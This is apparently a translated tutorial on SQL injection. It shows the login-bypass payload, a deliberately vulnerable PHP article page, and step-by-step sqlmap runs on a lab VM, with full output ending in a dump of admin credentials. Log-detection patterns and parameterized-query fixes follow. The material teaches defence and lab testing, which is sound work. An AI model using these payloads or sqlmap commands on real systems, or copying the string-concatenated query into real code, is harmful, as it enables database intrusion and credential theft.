SQL injection with sqlmap

There is a tool called sqlmap that is used mainly to identify and exploit SQL injection vulnerabilities. Here I am writing a tutorial on how to use it.
Because SQL injection is illegal, I use two of my own virtual machines for testing; please do not wreck other people's websites. (Most websites no longer have SQL injection vulnerabilities these days, and the fix is simple.)

1. What is a SQL vulnerability

To understand SQL vulnerabilities you first have to understand SQL statements. SQL stands for Structured Query Language; it is a programming language used mainly for querying databases. The databases typically installed on servers include Microsoft Access, MySQL, PostgreSQL and so on. I use MySQL here. Below are some query examples.
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
This statement looks up the records in the admin table whose user is test and whose pass is 123456 and returns the matching records; a typical login page uses a query of exactly this form.
But if the password I enter is  " OR "1"="1  and the username is test, does the SQL statement not become
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
Clearly the expression after WHERE is always true, so MySQL returns every record; the website wrongly concludes that the credentials are correct and logs you in as test.
If the site also has an admin flag, you can try the password  " OR "1"="1" AND writable = TRUE AND ""="  so that the SQL query becomes
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
Because AND binds tighter than OR, this is evaluated as (user = "test" AND pass = "") OR ("1"="1" AND writable = TRUE AND ""=""); the first part is false for a normal account and the second reduces to writable = TRUE, so MySQL returns the records whose writable is true.
Another case is viewing articles, which is usually done through a GET parameter id:
SELECT * FROM articles WHERE id = 1;
If the site does not validate id, try id=1 AND 1=1:
SELECT * FROM articles WHERE id = 1 AND 1=1;
If no error appears, injection may be possible. Change it to id=1 AND 1=2; if the site now says the article was not found, that is further evidence. Then change it to id="; if MySQL raises an error, which most sites display, the page can almost certainly be injected.
I will use this example for the injection.

2. Setting up the environment

I use Kali Linux 17.3 as the attacker and Ubuntu 18.04 LTS as the victim server. Build the server first (see "How to set up an Apache2 + PHP 5.6 + MySQL server on Ubuntu 18.04") and put the injectable page at /article.php with the code below.

<?php

if (!isset($_GET['id'])){
    echo '没有设置参数id';
    die(1);
}

$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn){
    echo '无法连接至数据库';
}

$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id']; // the vulnerability is here: the raw GET parameter is concatenated into the SQL
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row){
    echo '访问的文章不存在';
} else {
    echo $row['content'];
}

mysql_close($conn);

?>


Once the whole site is built, this is what it looks like in MySQL:
[screenshots of the website database in MySQL omitted]
Of course, I am not injecting just to read those few articles, which I can see directly through the web page anyway; the aim is to reach private data, such as the accounts and passwords in the admin table.

3. Testing before injection

The server address is 192.168.3.59. First visit the page to check whether it is injectable.
[screenshots omitted]
Clearly the page itself works fine. Now test with id=".
[screenshot omitted]
MySQL detects a syntax error in the SQL, so no results are returned at all.
[screenshots omitted]
This matches expectations exactly, which means the page is injectable.

4. Injecting with sqlmap

On Kali Linux, sqlmap is installed by default.
On Ubuntu, install it with apt install sqlmap.
On other systems, download the source from the official site; sqlmap is written in Python, so Python may need to be installed too.
Now the injection begins.
Run sqlmap -u '192.168.3.59/article.php?id=1'. The GET parameter must be included, otherwise sqlmap does not know which parameter to inject. The output looks roughly like this:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:30:43


The output above shows that the page is injectable, so the real injection starts now.
sqlmap -u '192.168.3.59/article.php?id=1' --dbs, whose output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website

[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:37:43


The injection found two databases, information_schema and website.
information_schema mainly holds MySQL's metadata about databases, tables and columns and contains nothing of interest; website holds the site's data, so that is the database to inject.
sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables, whose output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin    |
| articles |
+----------+

[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:41:14


Two tables were found, admin and articles; an attacker would naturally go for admin.
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns, whose output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+

[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:43:47


The injection returned three columns: user, id and pass. Obtaining user and pass yields the passwords (usually the login credentials for the site's admin backend).
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump, whose output is:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1817=1817

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA

[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) 'user, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+-------+--------+
| user  | pass   |
+-------+--------+
| test1 | 123456 |
| test2 | 123456 |
| test3 | 123456 |
+-------+--------+

[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:47:33


The administrator accounts and passwords were obtained successfully, and that concludes the injection.
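Seen from the server side, every sqlmap step above leaves the probes it reported (the AND 1817=1817 tautology, SLEEP(5), the UNION ALL SELECT) in the Apache access log. The following Python is an added example, not part of the original post: it flags such requests in constructed log lines by matching the URL-decoded query string against those patterns and the User-Agent against sqlmap's default prefix.

```python
"""Flag access-log requests carrying the injection probes sqlmap reported
in this post, or sqlmap's default User-Agent. Added example; the log lines
are constructed, not taken from a real server."""
import re
from urllib.parse import unquote_plus

# Constructed Apache 'combined' log lines. 192.168.3.59 is the post's victim
# server; the client addresses are made up. Payloads mirror the sqlmap output.
SAMPLE_LOG = """\
192.168.3.58 - - [01/Jan/2019:11:30:43 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.3.58 - - [01/Jan/2019:11:30:44 +0800] "GET /article.php?id=1%20AND%201817%3D1817 HTTP/1.1" 200 512 "-" "sqlmap/1.1.11#stable (http://sqlmap.org)"
192.168.3.58 - - [01/Jan/2019:11:30:50 +0800] "GET /article.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 41 "-" "sqlmap/1.1.11#stable (http://sqlmap.org)"
192.168.3.58 - - [01/Jan/2019:11:30:51 +0800] "GET /article.php?id=-2184%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716b707071%2C0x51%2C0x717a706271%29--%20BgjA HTTP/1.1" 200 600 "-" "Mozilla/5.0"
192.168.3.60 - - [01/Jan/2019:11:31:02 +0800] "GET /article.php?id=2 HTTP/1.1" 200 530 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules are applied to the URL-decoded request path, case-insensitively.
PAYLOAD_RULES = {
    "boolean tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),  # id=1 AND 1817=1817
    "time-based probe": re.compile(r"\bSLEEP\s*\(", re.I),              # id=1 AND SLEEP(5)
    "UNION extraction": re.compile(r"\bUNION(\s+ALL)?\s+SELECT\b", re.I),
}
# sqlmap's default User-Agent starts with "sqlmap/<version>"; a tester can
# override it, so this is a hint, not a guarantee.
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)


def analyse(log_text: str) -> list:
    """Return (client ip, decoded path, [reasons]) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = unquote_plus(m["path"])
        reasons = [name for name, rx in PAYLOAD_RULES.items() if rx.search(path)]
        if SQLMAP_UA.match(m["ua"]):
            reasons.append("sqlmap user-agent")
        if reasons:
            hits.append((m["ip"], path, reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in analyse(SAMPLE_LOG):
        print(f"{ip} {path}\n    -> {', '.join(reasons)}")
```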

5. How to fix SQL vulnerabilities

Take the vulnerability in my own page as an example. Before the fix it reads:

<?php

if (!isset($_GET['id'])){
    echo '没有设置参数id';
    die(1);
}

$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn){
    echo '无法连接至数据库';
}

$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id']; // the vulnerability is here: the raw GET parameter is concatenated into the SQL
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row){
    echo '访问的文章不存在';
} else {
    echo $row['content'];
}

mysql_close($conn);

?>


SQL injection is caused by illegal characters getting into the query, and there are many ways to deal with it.

  • Validate the parameter, for example check that id is an integer
  • Escape strings, since quotes are sometimes unavoidable; in PHP the addslashes function can be used
  • Install ready-made software (I do not know how it works, but many sites seem to have something like D盾 (D Shield) installed)
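As an added example (not the post's code), the following Python reproduces the two cases from section 1, the " OR "1"="1 login bypass and the id=1 AND 1=2 probe, against an in-memory SQLite table and places beside each vulnerable query its hardened form: the integer check from the first fix above, plus a parameterized query, which is the standard replacement for escaping with addslashes. SQLite treats double-quoted strings as identifiers, so the example uses single quotes where the post uses double quotes; the table contents are constructed.

```python
"""Vulnerable vs. hardened query building for the post's two cases (login
bypass, tampered article id), run against in-memory SQLite so it works
offline. Added example; the rows below are constructed sample data."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed data shaped like the post's admin and articles tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE admin (id INTEGER, user TEXT, pass TEXT);
        INSERT INTO admin VALUES (1, 'test1', '123456'), (2, 'test2', '123456');
        CREATE TABLE articles (id INTEGER, content TEXT);
        INSERT INTO articles VALUES (1, 'first article'), (2, 'second article');
        """
    )
    return conn


# --- vulnerable: user input becomes part of the SQL text --------------------
def login_vulnerable(conn, user: str, pw: str) -> list:
    # Same shape as the post's login query (single quotes: SQLite reads "..." as
    # an identifier). A quote in pw closes the literal and the rest is parsed as SQL.
    sql = f"SELECT user FROM admin WHERE user = '{user}' AND pass = '{pw}'"
    return [r[0] for r in conn.execute(sql)]


def article_vulnerable(conn, article_id: str):
    # Equivalent of  'SELECT ... WHERE id = ' . $_GET['id']  in article.php:
    # "1 AND 1=2" is evaluated as SQL, which is why the post's probe works.
    sql = "SELECT content FROM articles WHERE id = " + article_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


# --- hardened: validate the type, then bind values instead of splicing them --
def login_safe(conn, user: str, pw: str) -> list:
    # Parameters travel separately from the SQL text; the driver never lets a
    # quote inside pw terminate the string literal.
    sql = "SELECT user FROM admin WHERE user = ? AND pass = ?"
    return [r[0] for r in conn.execute(sql, (user, pw))]


def article_safe(conn, article_id: str):
    # First fix from the post: id must be an integer. Reject anything else
    # before it gets near the database, then bind the parsed value.
    if not article_id.isdecimal():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT content FROM articles WHERE id = ?"
    row = conn.execute(sql, (int(article_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    bypass = "' OR '1'='1"                        # the post's payload, single-quoted
    print(login_vulnerable(db, "test", bypass))   # every admin user: WHERE is always true
    print(login_safe(db, "test", bypass))         # []: the payload is just a wrong password
    print(article_vulnerable(db, "1 AND 1=2"))    # None: the probe was executed as SQL
    print(article_safe(db, "1"))                  # first article
```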

6. In practice

In reality, SQL injection is not this simple. Sometimes a wordlist is needed to guess table names (Kali ships with wordlists), sometimes injection fails altogether (perhaps because the wordlist is not good enough), and even when a password is obtained the login entry point may not be found (it is usually in an admin or login folder). So this article only shows one method and cannot guarantee a successful injection; I hope it helps.
